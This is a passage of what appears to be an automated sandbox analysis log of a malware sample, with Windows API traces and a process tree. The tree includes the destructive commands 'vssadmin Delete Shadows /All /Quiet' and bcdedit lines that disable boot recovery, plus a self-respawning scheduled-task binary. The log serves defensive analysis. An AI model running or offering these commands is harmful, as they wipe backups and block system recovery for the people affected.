lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.850] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.850] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.851] GetProcessHeap () returned 0x2f0000 [0046.851] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x0, Size=0x20c) returned 0x308ba0 [0046.851] GetConsoleTitleW (in: lpConsoleTitle=0x308ba0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.851] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.851] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.851] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.851] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.851] GetProcessHeap () returned 0x2f0000 [0046.851] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x4012) returned 0x30ae20 [0046.851] GetProcessHeap () returned 0x2f0000 [0046.851] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30ae20 | out: hHeap=0x2f0000) returned 1 [0046.852] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.852] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.852] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.852] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.852] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.852] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.852] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0046.852] GetProcessHeap () returned 0x2f0000 [0046.852] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0) returned 0x308dc0 [0046.852] GetProcessHeap () returned 0x2f0000 [0046.852] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x1c) returned 0x304650 [0046.852] GetProcessHeap () returned 0x2f0000 [0046.852] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x22) returned 0x304680 [0046.853] GetConsoleTitleW (in: lpConsoleTitle=0x26fad0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.854] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.854] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.854] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.854] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.854] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.854] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.854] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.854] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.854] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.854] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.854] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.854] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.854] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.854] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.854] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.854] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.854] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.854] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.854] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.854] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.854] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.854] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.854] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.854] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.854] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.854] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.854] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.854] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.854] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.854] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.854] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.854] GetProcessHeap () returned 0x2f0000 [0046.854] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x34) returned 0x306610 [0046.855] GetProcessHeap () returned 0x2f0000 [0046.855] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x306610, Size=0x22) returned 0x3046b0 [0046.855] GetProcessHeap () returned 0x2f0000 [0046.855] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x3046b0) returned 0x22 [0046.855] GetProcessHeap () returned 0x2f0000 [0046.855] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x2e) returned 0x306610 [0046.855] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x26f610 | out: TokenHandle=0x26f610*=0x0) returned 0xc000007c [0046.855] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x26f610 | out: TokenHandle=0x26f610*=0x4c) returned 0x0 [0046.855] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x26f620, TokenInformationLength=0x4, ReturnLength=0x26f628 | out: TokenInformation=0x26f620, ReturnLength=0x26f628) returned 0x0 [0046.855] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x26f628, TokenInformationLength=0x4, ReturnLength=0x26f620 | out: TokenInformation=0x26f628, ReturnLength=0x26f620) returned 0x0 [0046.855] NtClose (Handle=0x4c) returned 0x0 [0046.855] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x26f5f0, nSize=0x0, Arguments=0x26f5f8 | out: lpBuffer="躀0") returned 0xf [0046.856] GetProcessHeap () returned 0x2f0000 [0046.856] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x218) returned 0x308eb0 [0046.856] SetConsoleTitleW (lpConsoleTitle="Administrator: 3382479") returned 1 [0046.856] GetProcessHeap () returned 0x2f0000 [0046.856] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x308eb0 | out: hHeap=0x2f0000) returned 1 [0046.856] LocalFree (hMem=0x308e80) returned 0x0 [0046.856] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.856] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0046.856] _get_osfhandle (_FileHandle=1) returned 0x5c [0046.856] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 0 [0046.857] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.857] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.857] SetConsoleInputExeNameW () returned 0x1 [0046.857] GetConsoleOutputCP () returned 0x1b5 [0046.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.857] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.857] exit (_Code=0) Process: id = "11" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x1de0b000" os_pid = "0x180" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xb4c" cmd_line = "vssadmin.exe Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x2a8 Thread: id = 24 os_tid = 0x408 Thread: id = 25 os_tid = 0x778 Thread: id = 26 os_tid = 0x578 Thread: id = 27 os_tid = 0x80c Process: id = "12" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x1b22a000" os_pid = "0x758" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xb54" cmd_line = "bcdedit /set {default} recoveryenabled No" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 22 os_tid = 0x700 Process: id = "13" image_name = "bcdedit.exe" filename = "c:\\windows\\system32\\bcdedit.exe" page_root = "0x19651000" os_pid = "0x684" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xb70" cmd_line = "bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 23 os_tid = 0x314 Process: id = "14" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x1e727000" os_pid = "0x81c" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00071cff" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 28 os_tid = 0x86c Thread: id = 29 os_tid = 0x85c [0048.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf1d600 | out: lpSystemTimeAsFileTime=0xf1d600*(dwLowDateTime=0x1b1e5a00, dwHighDateTime=0x1d5e3d9)) [0048.700] GetCurrentProcessId () returned 0x81c [0048.700] GetCurrentThreadId () returned 0x85c [0048.700] GetTickCount () returned 0x115697d [0048.700] QueryPerformanceCounter (in: lpPerformanceCount=0xf1d608 | out: lpPerformanceCount=0xf1d608*=19062238434) returned 1 [0048.700] malloc (_Size=0x100) returned 0x408e80 Thread: id = 30 os_tid = 0x84c Thread: id = 31 os_tid = 0x83c Thread: id = 32 os_tid = 0x82c Thread: id = 33 os_tid = 0x87c Thread: id = 34 os_tid = 0x890 Thread: id = 50 os_tid = 0x940 Thread: id = 66 os_tid = 0xbf4 Process: id = "15" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9014000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000db03" [0xc000000f], "LOCAL" [0x7] Thread: id = 35 os_tid = 0x7c0 Thread: id = 36 os_tid = 0x310 Thread: id = 37 os_tid = 0x128 Thread: id = 38 os_tid = 0x7c8 Thread: id = 39 os_tid = 0x6cc Thread: id = 40 os_tid = 0x644 Thread: id = 41 os_tid = 0x63c Thread: id = 42 os_tid = 0x154 Thread: id = 43 os_tid = 0x150 Thread: id = 44 os_tid = 0x120 Thread: id = 45 os_tid = 0x124 Thread: id = 46 os_tid = 0x118 Thread: id = 47 os_tid = 0x3fc Thread: id = 48 os_tid = 0x900 Process: id = "16" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1e92d000" os_pid = "0x8a0" os_integrity_level = "0x4000" os_privileges = "0x60814080" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00072119" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 51 os_tid = 0x930 Thread: id = 52 os_tid = 0x8f0 Thread: id = 53 os_tid = 0x8e0 Thread: id = 54 os_tid = 0x8d0 Thread: id = 55 os_tid = 0x8c0 Thread: id = 56 os_tid = 0x8b0 Process: id = "17" image_name = "rundll32.exe" filename = "c:\\windows\\system32\\rundll32.exe" page_root = "0x1d1f8000" os_pid = "0x960" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x35c" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 57 os_tid = 0x970 Process: id = "18" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x20048000" os_pid = "0x9b0" os_integrity_level = "0x1000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x960" cmd_line = "\"C:\\Windows\\system32\\rundll32.exe\" \"C:\\Windows\\syswow64\\WININET.dll\",DispatchAPICall 1 " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x9c0 Thread: id = 60 os_tid = 0xaa0 Thread: id = 61 os_tid = 0xab0 Thread: id = 62 os_tid = 0xac0 Thread: id = 63 os_tid = 0xae0 Thread: id = 64 os_tid = 0x2ac Process: id = "19" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x78b7d000" os_pid = "0x51c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "3" os_parent_pid = "0x36c" cmd_line = "taskeng.exe {A8964CA8-0B5D-4923-862F-EF4A3137E46D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 70 os_tid = 0x520 Thread: id = 71 os_tid = 0x564 Thread: id = 72 os_tid = 0x5a0 Thread: id = 73 os_tid = 0x5b0 Thread: id = 74 os_tid = 0x5d4 Thread: id = 75 os_tid = 0x5d8 Thread: id = 76 os_tid = 0x61c Thread: id = 185 os_tid = 0x700 Process: id = "20" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x74b17000" os_pid = "0x668" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x51c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 77 os_tid = 0x66c Thread: id = 78 os_tid = 0x558 Thread: id = 79 os_tid = 0x488 Process: id = "21" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x5adc4000" os_pid = "0x624" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x668" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0x5cc Thread: id = 81 os_tid = 0x58c Thread: id = 82 os_tid = 0x64c Process: id = "22" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x4e15f000" os_pid = "0x700" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x624" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 83 os_tid = 0x724 Thread: id = 84 os_tid = 0x6ec Thread: id = 85 os_tid = 0x6e8 Process: id = "23" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x69e60000" os_pid = "0x568" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x700" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 86 os_tid = 0x584 Thread: id = 87 os_tid = 0x5ac Thread: id = 88 os_tid = 0x1d0 Process: id = "24" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x30e74000" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x568" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 89 os_tid = 0x338 Thread: id = 90 os_tid = 0x314 Thread: id = 91 os_tid = 0x5c8 Process: id = "25" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x68346000" os_pid = "0x694" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x5dc" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0x684 Thread: id = 93 os_tid = 0x5a4 Thread: id = 94 os_tid = 0x5ec Process: id = "26" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x6bba0000" os_pid = "0x3a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "25" os_parent_pid = "0x694" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 95 os_tid = 0x648 Thread: id = 96 os_tid = 0x6e4 Thread: id = 97 os_tid = 0x600 Process: id = "27" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x6524d000" os_pid = "0x214" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "26" os_parent_pid = "0x3a0" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 98 os_tid = 0x44c Thread: id = 99 os_tid = 0x46c Thread: id = 100 os_tid = 0x530 Process: id = "28" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x64de5000" os_pid = "0x31c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x214" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7be" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 101 os_tid = 0x324 Thread: id = 102 os_tid = 0x2fc Thread: id = 103 os_tid = 0x488 Process: id = "29" image_name = "jacksp~1.exe" filename = "c:\\progra~2\\common~1\\jacksp~1.exe" page_root = "0x630e0000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x31c" cmd_line = "C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" 